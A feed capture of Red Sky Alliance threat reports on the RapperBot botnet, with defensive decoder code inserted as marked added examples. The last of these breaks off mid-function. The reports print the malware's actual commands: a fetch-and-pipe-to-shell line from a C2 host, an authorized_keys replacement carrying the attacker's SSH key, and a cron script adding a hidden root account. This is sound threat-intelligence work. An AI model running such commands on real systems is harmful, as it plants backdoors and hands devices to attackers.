rapperbot - X-Industry - Red Sky Alliance (feed updated 2024-03-29T08:23:25Z, https://redskyalliance.org/xindustry/feed/tag/rapperbot)
RapperBot, https://redskyalliance.org/xindustry/rapperbot-1, published 2023-05-12T12:05:00.000Z, by Bill Schenkelberg (https://redskyalliance.org/members/BillSchenkelberg)
<div><p>FortiGuard Labs has encountered new samples of the RapperBot campaign active since January 2023. RapperBot is a malware family primarily targeting IoT devices. It has been observed in the wild since June 2022. FortiGuard Labs reported on its previous campaigns in <a href="https://www.fortinet.com/blog/threat-research/rapperbot-malware-discovery">August 2022</a> and <a href="https://www.fortinet.com/blog/threat-research/new-rapperbot-campaign-ddos-attacks">December 2022</a>. Those campaigns focused on brute-forcing devices with weak or default SSH or Telnet credentials to expand the botnet’s footprint for launching <a href="https://www.fortinet.com/resources/cyberglossary/ddos-attack">Distributed Denial of Service</a> (DDoS) attacks.</p>
<p>In this campaign, these threat actors have started venturing into <a href="https://www.fortinet.com/resources/cyberglossary/cryptojacking">cryptojacking</a>, specifically for Intel x64 machines. Initially, they deployed and executed a separate Monero cryptominer alongside the usual RapperBot binary. But in late January 2023, they combined both functionalities into a single bot. The below report will discuss the changes observed in this new campaign and provide a technical analysis of the RapperBot variant upgraded with miner capabilities.<a href="#_ftn1">[1]</a></p>
<p>Same But Different – Analysts began observing the first samples of this RapperBot miner campaign in January 2023. They share some characteristics that allowed us to link this campaign to the earlier ones.</p>
<p>The most unique and enduring trait of RapperBot samples is the YouTube URL <a href="https://www.youtube.com/watch?v=4fm_ZZn5qaw">https://www.youtube.com/watch?v=4fm_ZZn5qaw</a>, which has been seen in most samples from this family. However, the string is never actually used in this campaign, unlike older samples where it prints the URL to the console at the start of execution.</p>
<p>Another indicator of a RapperBot campaign is adding an SSH public key to ~/.ssh/authorized_keys to maintain backdoor access to infected machines, even after the devices have been rebooted. This latest campaign uses the same key observed in the first campaign in June 2022 and is listed in the IOC section below.</p>
<p>Beyond these similarities, however, we also observed some key differences, including several significant updates to the malware functionality, particularly in its C2 communication protocol.</p>
<p>One cluster of ARM samples, such as 7c9e6d63bc1f26e9c8a8703439e12de12da9892f2d6cd9bda5f45ec00c98a29f (Cluster A), delivered via hxxp://109[.]206[.]243[.]207/ssh/arm7, was very minimal in functionality. These samples included only three DoS attack types and no SSH brute forcing or self-propagation abilities. However, they included new code to collect and send information about the infected system upon registering with the C2 server.</p>
<p>Another cluster of ARM samples delivered from the same URL, such as 912e151641f20f9d689c6ea26cf6f11d5ee0b6fdc4d4a1179fac413391748c65 (Cluster B), resembles the above samples but with the inclusion of the SSH brute-forcer last seen in the June 2022 campaign. Unlike that campaign, credentials are embedded in each sample and not downloaded from the C2 server. These samples propagate themselves by downloading and executing hxxp://109[.]206[.]243[.]207/d upon the successful brute force breach of a system.</p>
<p>As in past campaigns, all samples from this campaign still encode sensitive strings with XOR encoding. But this time, the developers have opted to add an extra layer of XOR encoding, with the first layer using multi-byte XOR keys with different values and lengths for each encoded string. The second layer uses the same style of single-byte XOR encoding as in previous campaigns, with the key calculated by XORing all bytes of the first layer key (Figure 1). This additional layer of XOR encoding prevents XOR brute forcing and the easy detection of malware-related strings.</p>
<p>The original draft was worded ambiguously; we meant to say that this campaign embedded the credentials in each sample. In the previous campaign, the credentials were downloaded from the C2 server.</p>
<p><em>Figure 1: XOR string decoding</em></p>
<p>The structure of client requests to the Command-and-Control (C2) server has also been significantly updated. The unique 32-byte Bot ID sent with every request in previous campaigns has been removed. Instead, the request size is now variable, with random bytes generated to fill the unused parts of the request. Lastly, the request data is no longer located at fixed offsets within each request. We describe the communication protocol and request structure in more detail below.</p>
<p>Revamped C2 Communication Protocol - Upon execution, RapperBot connects to a hardcoded C2 server and sends a registration request (type 1) containing information about the victim system (Figure 2):</p>
<ol>
<li>Hardcoded value: 0x3 0xd3 0x4a 0xb6</li>
<li>Source: This is the first command line argument passed to the malware and usually indicates the infection vector (e.g., scan.ssh.x86_64)</li>
<li>Local IP address</li>
<li>UID (User identifier)</li>
<li>Current working directory</li>
<li>Number of processors</li>
<li>Total memory size</li>
<li>Open File Limit</li>
<li>Hostname</li>
<li>Processor model</li>
</ol>
<p><em>Figure 2: System info sent in the registration request</em></p>
<p>After that, it sends a keep-alive request (type 3) to inform the C2 server that it is ready to receive commands. The malware then performs this request at random intervals of 60 to 600 seconds.</p>
<p>To evade detection, the binary network protocol used to send these requests has been completely revised. Like its string encoding, it uses a two-layer approach to encode the information sent to the C2 server. The header data must first be decoded to reveal the location of the encoded information and the key needed to decode it.</p>
<p>The size of each request is randomized, so shorter requests do not stand out in network traffic. The malware starts by generating a random number between 4 and 128, which we will refer to as RAND_VALUE, and a random XOR key for the content that is 4 to 32 bytes long (its length is referred to as KEY_SIZE).</p>
<p>The request size is then calculated as follows:</p>
<p><strong>REQUEST_SIZE = RAND_VALUE + KEY_SIZE + CONTENT_SIZE + 6</strong></p>
<p>The malware then generates a buffer of the same size and fills it with random bytes. The first byte of this buffer will be used as a XOR key (HEADER_KEY) for encoding the header data. The second byte will be overwritten with the RAND_VALUE XORed with the HEADER_KEY.</p>
<p>The request header structure is stored at HEADER_OFFSET, which is RAND_VALUE / 2.</p>
<p>The format of the structure starting at HEADER_OFFSET is as follows:</p>
<p>Offset 0x2: ENC_REQ_TYPE (Request type xor HEADER_KEY)</p>
<p>Offset 0x3: ENC_KEY_SIZE (KEY_SIZE xor HEADER_KEY)</p>
<p>Offset 0x4: Start of KEY</p>
<p>Offset KEY_SIZE + 0x4: ENC_CODE_SIZE (little-endian word containing CONTENT_SIZE rol 8 xor HEADER_KEY)</p>
<p>Offset KEY_SIZE + 0x6: Start of encoded content (ENC_CONTENT)</p>
<p><em>Figure 3: Encoded registration request</em></p>
<p>All non-highlighted bytes in Figure 3 are unused padding bytes generated randomly by the malware. The Python code used to decode the content in each request with the HEADER_KEY and KEY is shown below:</p>
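<p>The report's own decoder is shown only as an image, so the following is an added example, not the report's or FortiGuard's code: a Python decoder for captured requests in the layout just described, plus the two-layer string decoding from the "Same But Different" section, with a builder used only to construct sample input. Points the text does not state and that are assumed here: HEADER_OFFSET uses integer division, the content is XORed with KEY repeated cyclically, HEADER_KEY is applied to the size word as a zero-extended 16-bit value, and the sample registration fields are NUL-separated.</p>

```python
"""Decoders for the RapperBot XOR string scheme and C2 request layout.

Added example, not code from the page or from FortiGuard. It follows the
field layout given in the text; these details are not stated there and
are assumptions: HEADER_OFFSET uses integer division, the content is
XORed with KEY cycled, HEADER_KEY is applied to the content-size word as
a zero-extended 16-bit value, and sample fields are NUL-separated.
"""
import random
import struct
from functools import reduce
from operator import xor

REQ_TYPES = {1: "register", 3: "keep-alive"}          # request types named in the text
REGISTRATION_MAGIC = bytes([0x03, 0xD3, 0x4A, 0xB6])  # leads the registration content


def xor_cycle(data: bytes, key: bytes) -> bytes:
    """XOR data with key repeated cyclically (layer 1 of the string scheme)."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def decode_string(enc: bytes, layer1_key: bytes) -> bytes:
    """Undo the two-layer string encoding: layer 2 is a single-byte XOR whose
    key is the XOR of all layer-1 key bytes. Because XOR composes, both
    layers reduce to one repeating-key pass with key1[i] ^ layer2_key."""
    layer2_key = reduce(xor, layer1_key)
    combined = bytes(k ^ layer2_key for k in layer1_key)
    return xor_cycle(enc, combined)


def _rol8_16(word: int) -> int:
    """Rotate a 16-bit word left by 8 bits (swaps its two bytes; self-inverse)."""
    return ((word << 8) | (word >> 8)) & 0xFFFF


def decode_request(buf: bytes) -> tuple:
    """Return (request_type, content); raise ValueError if the bytes are not
    self-consistent under the layout described in the text."""
    if len(buf) < 2:
        raise ValueError("too short for HEADER_KEY and encoded RAND_VALUE")
    header_key = buf[0]
    rand_value = buf[1] ^ header_key
    if not 4 <= rand_value <= 128:
        raise ValueError("RAND_VALUE outside 4..128")
    hdr = rand_value // 2                        # HEADER_OFFSET (assumed integer division)
    if len(buf) < hdr + 6:
        raise ValueError("too short for the header at HEADER_OFFSET")
    req_type = buf[hdr + 2] ^ header_key         # ENC_REQ_TYPE
    key_size = buf[hdr + 3] ^ header_key         # ENC_KEY_SIZE
    if not 4 <= key_size <= 32:
        raise ValueError("KEY_SIZE outside 4..32")
    key = buf[hdr + 4:hdr + 4 + key_size]        # KEY
    size_off = hdr + 4 + key_size                # ENC_CODE_SIZE
    if len(buf) < size_off + 2:
        raise ValueError("too short for ENC_CODE_SIZE")
    enc_word = struct.unpack_from("<H", buf, size_off)[0]
    content_size = _rol8_16(enc_word ^ header_key)
    # All fields are known now, so the total length must satisfy
    # REQUEST_SIZE = RAND_VALUE + KEY_SIZE + CONTENT_SIZE + 6.
    if len(buf) != rand_value + key_size + content_size + 6:
        raise ValueError("REQUEST_SIZE does not match the decoded fields")
    enc_content = buf[size_off + 2:size_off + 2 + content_size]
    return req_type, xor_cycle(enc_content, key)


def is_consistent_request(buf: bytes) -> bool:
    """Cheap triage check for a captured blob: does it satisfy the layout?"""
    try:
        decode_request(buf)
        return True
    except ValueError:
        return False


def build_request(req_type: int, content: bytes, rng: random.Random) -> bytes:
    """Construct a request in the described layout; used here only to make
    sample captures for exercising decode_request()."""
    rand_value = rng.randint(4, 128)
    key_size = rng.randint(4, 32)
    key = bytes(rng.randrange(256) for _ in range(key_size))
    size = rand_value + key_size + len(content) + 6
    buf = bytearray(rng.randrange(256) for _ in range(size))   # random padding
    header_key = buf[0]
    buf[1] = rand_value ^ header_key
    hdr = rand_value // 2
    buf[hdr + 2] = req_type ^ header_key
    buf[hdr + 3] = key_size ^ header_key
    buf[hdr + 4:hdr + 4 + key_size] = key
    struct.pack_into("<H", buf, hdr + 4 + key_size, _rol8_16(len(content)) ^ header_key)
    buf[hdr + 6 + key_size:hdr + 6 + key_size + len(content)] = xor_cycle(content, key)
    return bytes(buf)


def sample_registration_content() -> bytes:
    """Constructed registration content: the hardcoded value followed by the
    fields listed in the text (the NUL separators are an assumption)."""
    fields = [b"scan.ssh.x86_64", b"192.0.2.10", b"0", b"/tmp", b"4",
              b"8388608", b"1024", b"lab-host", b"constructed CPU model"]
    return REGISTRATION_MAGIC + b"\x00".join(fields)


def sample_capture(seed: int, req_type: int = 1) -> bytes:
    """Deterministic constructed capture for a given seed."""
    content = sample_registration_content() if req_type == 1 else b""
    return build_request(req_type, content, random.Random(seed))
```

<p>Because the padding, offset and key change per request, a static signature on the wire is impractical; the length consistency check above is the kind of structural test that can triage candidate blobs.</p>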
<p><em>[Image in the original report: Python code used to decode the request content]</em></p>
<p>While we did not receive commands from the C2 server, our analysis shows that the bot supports the following commands with their corresponding IDs.</p>
<p>4: Perform DDoS attacks (UDP, TCP, and HTTP GET)</p>
<p>5: Stop DDoS attacks</p>
<p>6: Terminate itself (and any child processes)</p>
<p>Expanding into Cryptojacking - The change in the C2 communication protocol is not the only major update in this campaign. Until now, RapperBot has been primarily geared toward using its victims for DDoS operations. For this campaign, however, it has started to venture into abusing the resources of infected Intel x64 machines to mine for cryptocurrency, commonly known as Cryptojacking.</p>
<p>We observed that hxxp://109[.]206[.]243[.]207/ssh/x86_64 started serving Bash shell scripts instead of the usual RapperBot binary for the x64 architecture as early as January 12. These Bash scripts (example hash: 7f6e0fa785820075a61819ca6b272a239733b770eb8a92a4056cf5d26d89795f) downloaded and executed separate XMRig crypto miners (example hash: 0ad68d5804804c25a6f6f3d87cc3a3886583f69b7115ba01ab7c6dd96a186404) and RapperBot binaries, as seen in Figure 4.</p>
<p><em>Figure 4: Bash script delivers bot and miner</em></p>
<p>XMRig is an open-source Monero miner commonly abused by threat actors for cryptojacking. Monero (XMR) is a popular cryptocurrency for illicit mining by threat actors because of its privacy-enhancing features. It is also designed to be more resistant to application-specific integrated circuit (ASIC) miners, which makes it possible to mine profitably with just consumer-grade hardware.</p>
<p>In late January 2023, FortiGuard Labs collected a significantly larger x64 sample f06d698967cee77e5a7bf9835b0a93394097e7590c156ed0d8c6304345701cfa, which used the same C2 server IP and communication protocol. On further analysis, we verified that the bot developers had merged the RapperBot C source code with the C++ code of the XMRig Monero miner to create a combined bot client with mining capabilities.</p>
<p>Mining Under the Radar - Apart from executing the miner as a child process upon execution, these samples are functionally identical to those targeting ARM devices and do not have SSH brute-forcing or self-replication capabilities. Merging the bot and miner code might be an attempt to hide the mining pools and Monero wallet addresses (listed in the IOCs section) using the same double-layer XOR encoding so they are not exposed in the clear, as in the Bash script (Figure 4).</p>
<p>The miner code also contains several modifications to facilitate cryptojacking.</p>
<p>The ability to read external configuration files has been removed, so it always uses the configuration built into the binary itself. The bot decodes the mining pools and Monero wallet addresses and updates the hardcoded configuration before starting the embedded miner.</p>
<p>The miner is also configured to use multiple mining pools for both redundancy and additional privacy. Two of them are mining proxies hosted on the RapperBot C2 IP itself. This allows the threat actor to omit both the wallet addresses and actual mining pools from the miner configuration. Additionally, they can change this information on the proxy server without rebuilding and deploying new bots. Aside from this, it is also configured to directly use a public mining pool, likely as a backup if the C2 IP goes offline.</p>
<p>To prevent the termination of the miner process by the machine owner, the default signal handlers for the SIGTERM, SIGUSR1, SIGINT, and SIGHUP signals have been removed. The usage information printed when executing the --help command line argument has also been removed, likely to evade detection by security products and competing miners from other cryptojacking groups. Likewise, the developers replaced “XMRig” with “asbuasdbu” in the version information to prevent easy identification.</p>
<p>To maximize mining efficiency, it kills off other miners by enumerating other running processes and attempts to scan the associated binaries on disk for the following blacklisted keywords. These processes are then terminated, and the corresponding files are deleted. For example, “--algo” in the list below is part of the usage information printed by standard XMRig miners.</p>
<ul>
<li>xmrig</li>
<li>.rsync</li>
<li>miner</li>
<li>moner</li>
<li>UPX!</li>
<li>--algo</li>
<li>network01</li>
<li>faster than light</li>
<li>dota2</li>
<li>.rsync</li>
<li>cat /proc/cpuinfo</li>
<li>/etc/cron.hourly/gcc.sh</li>
<li>/etc/daemon.cfg</li>
<li>denyip=</li>
</ul>
<p>If the binaries are not readable, it will look for blacklisted keywords within the file paths, terminate the processes, and delete the associated files.</p>
<ul>
<li>/shm/</li>
<li>/dev/netslink/</li>
<li>/tmp/</li>
<li>xmrig</li>
<li>.X19-unix</li>
<li>netwalker</li>
<li>(deleted)</li>
<li>.rsync</li>
<li>/a/</li>
<li>/b/</li>
<li>/c/</li>
<li>miner</li>
<li>dota</li>
<li>network01</li>
<li>xrx</li>
<li>/.x</li>
</ul>
<p>Lastly, it will terminate processes containing the blacklisted keywords in the process path or its command line arguments. Processes with path or command-line arguments containing “/zvx/” are whitelisted and never terminated.</p>
<ul>
<li>wget</li>
<li>curl</li>
<li>netstat</li>
<li>kill</li>
<li>3333</li>
<li>zmap</li>
<li>tsm</li>
<li>passwd</li>
<li>netwalk</li>
<li>zzh</li>
<li>xrx</li>
<li>pnscan</li>
<li>xri</li>
</ul>
<p>Based on the keywords used, the bot developers are more interested in terminating other miners than other IoT bots. This reaffirms their focus on cryptojacking over DDoS attacks, at least on x64 machines.</p>
<p>As a side note, we have not discovered an infection vector that directly delivers x64 RapperBot, as none of the RapperBot samples with an integrated miner appear to have self-propagation capabilities. This suggests the possible availability of an external loader operated by the threat actor that abuses the credentials collected by other RapperBot samples with brute forcing capabilities and infects only x64 machines with the combined bot/miner.</p>
<p>Alternatively, the addition of the threat actor’s public SSH key in infected machines might provide another point of entry for these x64 samples.</p>
<p>Conclusion - Financially motivated botnet operators are always on the lookout to extract the maximum value from machines infected by their botnets. The threat actors behind the RapperBot botnet are no exception, as evident in their addition of cryptojacking capabilities to target x64 machines.</p>
<p>RapperBot continues to be a dangerous threat due to its continual updates to evade detection, as highlighted above. As its primary infection vector, compromising SSH services that use weak or default passwords, remains the same, enabling public key authentication or setting strong passwords on all devices connected to the internet is still an effective mitigation.</p>
<p><strong>IOCs</strong></p>
<p>Files:</p>
<p>XMRig miner</p>
<ul>
<li>0ad68d5804804c25a6f6f3d87cc3a3886583f69b7115ba01ab7c6dd96a186404</li>
</ul>
<p> </p>
<p>Bash scripts</p>
<ul>
<li>bd87ac780e574ae8415907f88a3b48af578bb269308b56826e2f33438559e4b7</li>
<li>3296598c79748322dfff8eb786705d048725c04b23dd3a293f52a1acafe9e7ae</li>
<li>7f6e0fa785820075a61819ca6b272a239733b770eb8a92a4056cf5d26d89795f</li>
</ul>
<p> </p>
<p>C2s</p>
<ul>
<li>109[.]206[.]243[.]207</li>
<li>171[.]22[.]136[.]15</li>
</ul>
<p> </p>
<p>Mining Pools</p>
<ul>
<li>109[.]206[.]243[.]207:31271</li>
<li>109[.]206[.]243[.]207:25621</li>
<li>pool[.]hashvault[.]pro:80</li>
</ul>
<p> </p>
<p>Monero Wallets</p>
<ul>
<li>43Zs6jyniktVUNfiN8NY16TrvFKWbx3qogoRvstuquZdVA8EXvhqhz1W4hUzpjQXHAf3pDQ8UXxegFh8G26uCycKPz41ceW</li>
<li>47RupsxSjeHb4sHMwJ681vbjpFHAwXg6kMn1znbioqy96Qj9j2VuHrD2mXsEReELEdjRsDVKBK3Ru3diW3AgZ41Z7mzDwb4</li>
</ul>
<p> </p>
<p>SSH Key</p>
<p>[public key removed] system key generated by server 20220709</p>
<p>Red Sky Alliance is a Cyber Threat Analysis and Intelligence Service organization. For questions, comments, or assistance, please get in touch with the office directly at 1-844-492-7225, or feedback@redskyalliance.com</p>
<p>Weekly Cyber Intelligence Briefings:</p>
<ul>
<li>Reporting: <a href="https://www.redskyalliance.org/">https://www.redskyalliance.org/</a></li>
<li>Website: <a href="https://www.redskyalliance.com/">https://www.redskyalliance.com/</a></li>
<li>LinkedIn: <a href="https://www.linkedin.com/company/64265941">https://www.linkedin.com/company/64265941</a></li>
</ul>
<p>REDSHORTS - Weekly Cyber Intelligence Briefings</p>
<p><a href="https://attendee.gotowebinar.com/register/550422929596">https://attendee.gotowebinar.com/register/550422929596</a></p>
<p><a href="#_ftnref1">[1]</a> <a href="https://www.fortinet.com/blog/threat-research/rapperbot-ddos-botnet-expands-into-cryptojacking/">https://www.fortinet.com/blog/threat-research/rapperbot-ddos-botnet-expands-into-cryptojacking/</a></p></div>
Weekly Cyber Intel Report - All Sector 11 25 2022, https://redskyalliance.org/xindustry/weekly-cyber-intel-report-all-sector-11-25-2022, published 2022-11-25T13:57:24.000Z, by Bill Schenkelberg (https://redskyalliance.org/members/BillSchenkelberg)
<div><h2>Activity Summary - Week Ending on 25 November 2022:</h2>
<ul>
<li>Red Sky Alliance identified 26,613 connections from new IP’s checking in with our Sinkholes</li>
<li>Contabo GmbH in Germany hit 100x</li>
<li>Analysts identified 769 new IP addresses participating in various Botnets</li>
<li>New RapperBot Campaign</li>
<li>Somnia Ransomware</li>
<li>New Inlock and Xorist Variants</li>
<li>Debugging .NET Malware</li>
<li>Iranian Drones</li>
<li>City of Westmount, Quebec hit</li>
<li>Nord Stream2 and AIS</li>
<li>Kiwi Attacks</li>
</ul>
<p>Link to full report: IR-22-329-001_weekly329.pdf</p></div>
RapperBot, https://redskyalliance.org/xindustry/rapperbot, published 2022-08-21T14:33:32.000Z, by Bill Schenkelberg (https://redskyalliance.org/members/BillSchenkelberg)
<div><p>FortiGuard Labs researchers have been tracking a quickly evolving IoT malware family known as “RapperBot” since mid-June 2022. This family borrows heavily from the original Mirai source code, but what separates it from other IoT malware families is its built-in capability to brute force credentials and gain access to SSH servers instead of Telnet as implemented in Mirai. In addition, recent samples show that its developers have started adding code to maintain persistence, which is rarely done in other Mirai variants. This provides threat actors with continued access to infected devices via SSH even after the device is rebooted or the malware has been removed. This shared report reveals how this threat infects and persists on a victim device, as well as interesting changes that make us question the real intention of the threat actors.<a href="#_ftn1">[1]</a></p>
<p><strong>Affected Platforms</strong>: Linux</p>
<p><strong>Impacted Users</strong>: Any organization</p>
<p><strong>Impact</strong>: Remote attackers gain control of the vulnerable systems</p>
<p><strong>Severity Level</strong>: <u>Critical</u></p>
<p>Discovery: In June 2022, researchers encountered IoT malware samples with SSH-related strings, something not often seen in other IoT threat campaigns. What piqued our interest more was the size of the code referencing these strings in relation to the code used for DDoS attacks, which usually comprises most of the code in other variants. Upon further analysis, they discovered that this malware family, titled “RapperBot,” is designed to function primarily as an SSH brute forcer with limited DDoS capabilities. As is typical of most IoT malware, it targets ARM, MIPS, SPARC, and x86 architectures. The name “RapperBot” comes from an early July report from <a href="https://www.ics-cert.org.cn/portal/page/112/1208496c5e164aceb8dadd08ab993dd2.html">CNCERT</a> where an embedded URL to a YouTube rap music video was found in older samples. The samples of RapperBot released after this report do not contain this URL.</p>
<p>Analysis: RapperBot heavily reuses parts of the Mirai source code, but its features and implementation details, e.g., the Command &amp; Control (C2) command protocol, differ significantly from the original Mirai and typical Mirai-based variants monitored by FortiGuard Labs. Unlike the majority of Mirai variants, which natively brute force Telnet servers using default or weak passwords, RapperBot exclusively scans and attempts to brute force SSH servers configured to accept password authentication. The bulk of the malware code contains an implementation of an SSH 2.0 client that can connect to and brute force any SSH server that supports Diffie-Hellman key exchange with 768-bit or 2048-bit keys and data encryption using AES128-CTR.</p>
<p>A distinctive feature of the brute forcing implementation in RapperBot is the use of “SSH-2.0-HELLOWORLD” to identify itself to the target SSH server during the SSH Protocol Exchange phase. The appearance of this RapperBot in mid-June coincides with the observation of this same client identification string by <a href="https://isc.sans.edu/diary/Analysis+of+SSH+Honeypot+Data+with+PowerBI/28872">SANS Internet Storm Center</a> in their honeypot logs. Earlier samples had the brute-forcing credential list hardcoded into the binary. From July onwards, samples now retrieve this list from another port on the C2 server. This allows the threat actors to continually add new SSH credentials without having to update infected devices with new samples. This port number ranges from 4343 to 4345 in the latest samples. Once RapperBot successfully brute forces an SSH server, the valid credentials are reported to the C2 server on a separate port (currently 48109) without executing further commands on the remote victim.</p>
<p>In late June, however, FortiGuard Labs found some samples that attempted to self-propagate via a remote binary downloader post-compromise. The commands executed on the compromised SSH server are shown below.</p>
<ul>
<li>Sh</li>
<li>Enable</li>
<li>Shell</li>
<li>Debug</li>
<li>Shell</li>
<li>cmd wget</li>
<li>http://2[.]58[.]149[.]116/w -O- | sh; curl http://2[.]58[.]149[.]116/c -O- | sh</li>
</ul>
<p>For unknown reasons, this propagation functionality was removed in samples collected a few days later and has not been seen in subsequent samples. As with the original Mirai, analysts suspect the threat actors have implemented a separate loader system that would subsequently connect to the victim to download and execute the bot client.</p>
<p>Since mid-July 2022, RapperBot has switched from self-propagation to maintaining remote access into the brute-forced SSH servers. It runs a shell command to replace remote victims’ ~/.ssh/authorized_keys with one containing the threat actors’ SSH public key with the comment “helloworld,” as shown below.</p>
<p>cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsaAAAAB3NzaC1yc2EAAAADAQABAAACAQC/yU0iqklqw6etPlUon4mZzxslFWq8G8sRyluQMD3i8tpQWT2cX/mwGgSRCz7HMLyxt87olYIPemTIRBiyqk8SLD3ijQpfZwQ9vs Hc47hdTBfj89FeHJGGm1KpWg8lrXeMW+5jIXTFmEFhbJ18wc25Dcds4QCM0DvZGr/Pg4+kqJ0gLyqYmB2fdNzBcU05QhhWW6tSuYcXcyAz8Cp73JmN6TcPuVqHeFYDg05KweY qTqThFFHbdxdqqrWy6fNt8q/cgI30NBa5W2LyZ4b1v6324IEJuxImARIxTc96Igaf30LUza8kbZyc3bewY6IsFUN1PjQJcJi0ubVLyWyyJ554Tv8BBfPdY4jqCr4PzaJ2Rc1J FJYUSVVT4yX2p7L6iRpW212eZmqLMSoR5a2a/tO2s1giIlb+0EHtFWc2QH7yz/ZBjnun7opIoslLVvYJ9cxMoLeLr5Ig+zny+IEA3x090xtcL62X0jea6btVnYo7UN2BARziis Zze6oVuOTCBijuyvOM6ROZ6s/wl4CQAOSLDeFIP5L1paP9V1XLaYLDBAodNaUPFfTxggH3tZrnnU8Dge5/1JNa08F3WNUPM1S1x8L2HMatwc82x35jXyBSp3AMbdxMPhvyYI8v 2J1PqJH8OqGTVjdWe40mD2osRgLo1EOfP/SFBTD5VEo95K2ZLQ== helloworld">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~;</p>
<p>Public keys stored in ~/.ssh/authorized_keys allow anyone with the corresponding private key to connect and authenticate to an SSH server without needing to supply a password. This presents a threat to compromised SSH servers, as threat actors can access them even after SSH credentials have been changed or SSH password authentication is disabled. Moreover, since the file is replaced, all existing authorized keys are deleted, which prevents legitimate users from accessing the SSH server via public key authentication.</p>
<p>Apart from maintaining access to every SSH server that it brute forces, RapperBot is also very intent on retaining its foothold on any devices on which it is executed. Samples from mid-July append the same aforementioned SSH key to the local "~/.ssh/authorized_keys" on the infected device upon execution. This allows RapperBot to maintain its access to these infected devices via SSH even after a device reboot or the removal of RapperBot from the device – something that is atypical to most Mirai variants. To better hide in plain sight, the latest samples use a more innocuous comment "system key generated by server 20220709" for the public key instead of “helloworld.”</p>
<p>In the latest RapperBot samples, the malware also started adding the root user “suhelper” to the infected device by directly writing to “/etc/passwd” and “/etc/shadow/”, further allowing the threat actor to take complete control of the device. In conjunction, it re-adds the root user account every hour by writing the following script to “/etc/cron.hourly/0”, in the event that other users (or botnets) attempt to remove the account from the victim system. The command to add the root user is provided below.</p>
<p>#!/bin/sh<br /> <br /> useradd -u 0 -g 0 -o -d / suhelper -p '$1$1OJBlhUV$E9DMK0xdoZb8W8wVOibPQ/' >/dev/null 2>&1</p>
<p> </p>
<p>Figure 1 illustrates how the latest samples of RapperBot work. Dotted lines indicate potential actions that FortiGuard Labs assesses the threat actor could perform but that have not been observed in the wild.</p>
<p><em>Figure 1: RapperBot execution flow</em></p>
<p>While early samples had strings in plaintext, subsequent samples added extra obfuscation to the strings by building them on the stack. This prevents common analysis tools and detection techniques from extracting human-readable strings from binary files (Figure 2).</p>
<p><em>Figure 2: strings built on the stack</em></p>
<p>These latest samples implemented an additional layer of Mirai-style XOR encoding to hide these strings from memory scanners during execution. While most Mirai and Gafgyt botnet operators, like <a href="https://www.fortinet.com/blog/threat-research/enemybot-a-look-into-keksecs-latest-ddos-botnet">Keksec</a>, tend to include strings identifying themselves within the malware samples, the developers of this malware maintain a relatively low profile (apart from occasional references to rap music).</p>
<p>Network Protocol: RapperBot communicates with its C2 server via TCP requests at separate ports to receive commands (443 in the latest samples), download SSH credential lists, or report valid credentials during SSH brute forcing. The network protocol for commands is explained in further detail below. Each request contains a bot ID, a 32-byte value hardcoded in the binary. FortiGuard Labs observed two IDs as follows:</p>
<p>d4 1c 74 44 70 95 28 ff f0 98 ae 4e 6f 92 ba d5 0f cd 56 29 c5 12 53 a1 fe 46 53 c7 0b b5 18 27</p>
<p>f6 b7 0b 00 14 77 35 f9 8d 6d 5d c4 bd 23 88 7e cf 5e 02 ce 54 5f e7 b1 e6 3f 2a 16 71 b6 eb 9a (<em>a separate cluster seen only in late December 2021</em>)</p>
<p>As a side note, pivoting on these bot IDs allowed us to find older samples from November 2021. However, the SSH brute forcing capability was only seen in samples from mid-June 2022.</p>
<p>RapperBot starts by sending a registration packet to the C2 server. This includes the argument (referred to as “source” by Mirai) used when the binary was executed in the victim system, which usually provides some basic contextual info about its execution. For instance, “ssh.wget.arm7” would tell the C2 that the binary was spread via SSH protocol, downloaded via the wget utility, and is of ARM architecture.</p>
<p>The succeeding communication uses the following structure:</p>
<p>struct rapperbot_registration {</p>
<p> byte bot_id[32];</p>
<p> int command_code;</p>
<p> byte source[32]; // e.g., "ssh.wget.arm7"</p>
<p>};</p>
<p>Here are the command codes supported by RapperBot:</p>
<p><strong>0x00</strong>: Register (used by the client)</p>
<p><strong>0x01</strong>: Keep-Alive/Do nothing</p>
<p><strong>0x02:</strong> Stop all DoS attacks and terminate the client</p>
<p><strong>0x03</strong>: Perform a DoS attack</p>
<p><strong>0x04</strong>: Stop all DoS attacks</p>
<p>Right after the registration packet, the client sends another request to notify the C2 that the client is ready to receive commands. The C2 server usually responds with a keep-alive command to acknowledge the request (Figure 3).</p>
<p><a href="{{#staticFileLink}}10779953284,RESIZE_584x{{/staticFileLink}}"><img class="align-left" src="{{#staticFileLink}}10779953284,RESIZE_400x{{/staticFileLink}}" width="350" alt="10779953284?profile=RESIZE_400x" /></a></p>
<p>Figure 3: (left) RapperBot client-server communication</p>
<p>Besides the keep-alive command, we did not observe any other commands from the C2 server during our analysis.</p>
<p>However, RapperBot does support a very minimal set of DoS attacks, including plain UDP and TCP STOMP flood attacks that are very similar to Mirai’s implementation.</p>
<p>The attack command structure is as follows:</p>
<pre><code>struct rapperbot_attack_command {
    byte   bot_id[32];
    int    command_code;   // 0x03
    byte   vector;         // type of DoS attack
    ushort target_port;
    int    duration;
    int    target_ip;
};</code></pre>
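<p>As an added example (not FortiGuard's or RapperBot's code), the following Python decoder parses the registration and attack-command structures above so that captured C2 traffic can be labelled during triage. Its wire-layout assumptions are not stated in the report: fields are packed without padding, integers are big-endian, <code>int</code> is 4 bytes, <code>ushort</code> 2 bytes, and <code>source</code> is a NUL-padded ASCII string.</p>

```python
import struct
import ipaddress

# Bot IDs quoted in the report above; the second belongs to the late-2021 cluster.
ID_A = bytes.fromhex("d41c7444709528fff098ae4e6f92bad50fcd5629c51253a1fe4653c70bb51827")
ID_B = bytes.fromhex("f6b70b00147735f98d6d5dc4bd23887ecf5e02ce545fe7b1e63f2a1671b6eb9a")
KNOWN_BOT_IDS = {ID_A, ID_B}

COMMANDS = {0x00: "register", 0x01: "keep-alive",
            0x02: "stop DoS and terminate", 0x03: "DoS attack", 0x04: "stop all DoS"}

# Assumed wire layout (not stated in the report): packed, big-endian,
# int = 4 bytes, ushort = 2 bytes, byte = 1 byte, source = NUL-padded ASCII.
HEADER_FMT = ">32si"               # bot_id[32], command_code
REG_FMT = HEADER_FMT + "32s"       # + source[32]
ATTACK_FMT = HEADER_FMT + "BHiI"   # + vector, target_port, duration, target_ip


def decode_packet(data: bytes) -> dict:
    """Decode one RapperBot C2 message; raises ValueError if it is truncated."""
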